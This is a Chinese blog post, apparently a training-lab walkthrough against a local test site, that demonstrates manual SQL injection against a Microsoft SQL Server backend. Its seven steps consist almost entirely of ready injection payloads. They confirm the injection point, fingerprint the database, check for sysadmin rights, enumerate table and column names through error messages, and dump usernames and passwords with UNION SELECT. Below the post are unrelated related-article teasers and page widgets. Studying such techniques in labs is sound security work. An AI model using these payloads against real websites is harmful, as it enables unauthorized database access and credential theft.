Mssql手工注入

于 2024-08-20 17:10:06 发布
阅读量190 收藏 9
点赞数 6
文章标签: sqlserver 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141362322
版权

步骤⼀:在第⼀关使⽤单双引号判断是否存在注⼊,根据报错的回显可知数据类型为字符型

http://172.16.1.34/less-1.asp?id=1

步骤⼆:可通过以下Payload来探测当前站点是否是MSSQL数据库,正常执⾏说明后台数据库是MSSQL;也可根据⻚⾯报错信息来判断数据库

'and exists(select * from sysobjects)--+
'and exists(select count(*)from sysobjects)--+

步骤三:也可根据以下sql语句来判断注⼊点权限...(根据⻚⾯显示效果)

判断当前是否为sa
' and exists(select is_srvrolemember(' sysadmin '))--+
' and (select is_srvrolemember(' sysadmin '))>0--+

步骤四:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限

' union select 1,user,is_srvrolemember('public')--+
-1' union select 1,@@version,is_srvrolemember('public')--+

步骤五:通过以下语句来猜解有哪些表,从⽽获取⽬标站点的表信息

'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name f
rom [sysobjects] where xtype=char(85) and status!=1 order by id)t order b
y id desc)=1-- +  //users
第⼆张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n
ame !='users')--+   //emails
第三张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n
ame !='users' and name !='emails')--+   //uagents
第四张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n
ame !='users' and name !='emails' and name !='uagents')--+   //referers
第五张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n
ame !='users' and name !='emails' and name !='uagents' and name !='referer
s')--+     //返回结果为空,说明不知道第五张表

步骤六:通过以下语句爆出表下的所有字段信息

'having 1=1--
'group by id having 1=1--+
'group by id,username having 1=1--+
字段名: id , username , password

步骤七:爆字段值

查询字段数据
1'order by 3--+   //回显正常
1'order by 4--+   //回显错误
回显存在内容的字段
-1'union select 1,2,3 from users--+
查询字段内容
-1' union%20 select 1,username,password from users--+
2407-2 shw
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
PHP+MySQL 手工注入语句大全 推荐
10-29
标题中提到的“PHP+MySQL手工注入语句大全推荐”以及描述中提到的“PHP MYSQL手工注射”的知识点主要包括了如何利用SQL注入技术在PHP开发的网站中,通过MySQL数据库的漏洞来获取敏感信息或控制系统。由于这些操作在...
MySql手工注入.doc#资源达人分享计划#
08-12
MySQL手工注入是网络安全领域中的一个重要话题,特别是在Web应用程序的安全防护中。MySQL数据库由于其广泛使用,成为了黑客攻击的目标。在本教程中,我们将探讨如何利用MySQL手工注入漏洞来获取敏感信息。 首先,...
sql server 2008 mysql 手工注入
03-25
总的来说,SQL Server 2008和MySQL手工注入问题可以通过编程最佳实践、使用预处理语句、限制用户权限以及保持系统更新来有效预防。了解这些概念并能实际应用,对于任何IT专业人士,尤其是负责数据库管理和安全的...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 275
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
最新发布
HAN_789的博客
08-19 117
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 463
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 405
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
weixin_43213064的博客
08-16 1109
【代码】springboot旅游网站
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 630
本教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 507
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
企业架构MySQL读写分离
A1357924680_的博客
08-16 835
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
实训day21
2201_75673097的博客
08-17 821
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
SAP Memory & ABAP Memory超级详细解析
qq_53645728的博客
08-18 1062
该语句将使用 EXPORT 语句写入数据库表 dbtab 的数据集群的所有数据对象的内容表传递给内部表 itab,数据库表 dbtab 的 ID 位于 id 中指定的区域 ar 中。它们还定义了适当的转换规则。规则扩展的目的是,在结构类型相同的情况下,如果最高级别的源结构比数据簇中的目标结构有更多的组件,则多余的组件将被删除。允许使用以下值: F “表示基本的平面数据对象,”G “表示字符串,”R “表示平面结构,”S “表示深层结构,”T “表示具有平面行类型的内部表,”C "表示具有深层行类型的表。
17.session不共享问题
卷土的博客
08-16 214
多台Tomcat并不共享session存储空间,当请求切换到不同的tomcat服务时导致数据丢失问题。考虑到以后微服务部署多个项目,也就是多个tomcat就会出现session不共享问题。
Pydantic serialisation 结合 tortoise-orm 使用文档
????Fender的博客????
08-16 1156
Pydantic serialisation 结合 tortoise-orm 使用文档
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-15 1019
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
2024年8月16日(运维自动化 ansible)
weixin_70751333的博客
08-16 1012
group01][group02]},},},[root@m0 ~]# ansible group02 -m ping #192.168.8.183没有免密,报错[root@m0 ~]# vim /etc/ansible/hosts #重新修改文件[group01][group02]other[root@m0 ~]# ansible group02 -m ping #不报错了[root@m0 ~]# ansible other -m ping #单独也是成功的},
【Qt开发】事件与信号/事件过滤器
qq_53505979的博客
08-16 896
例如:一个窗口可以作为其界面上的QLabel组件的事件过滤器,派发给QLabel组件的事件由窗口去处理,这样就不需要重新定义一个标签类啦。如果有事件就派发给接收事件的对象去处理,事件循环还可以把相同的事件进行合并发送给接收事件的对象去处理。注意,应用程序的事件循环只会处理自主事件和发布事件,而不会处理发送事件,因为发送事件是以同步模式运行的。每一个事件都有唯一的的事件类型,也有对应的事件类,有的事件类可以处理多种类型的事件。参数e就是事件对象,通过e->type()来判断事件的类型,调用对应的处理函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值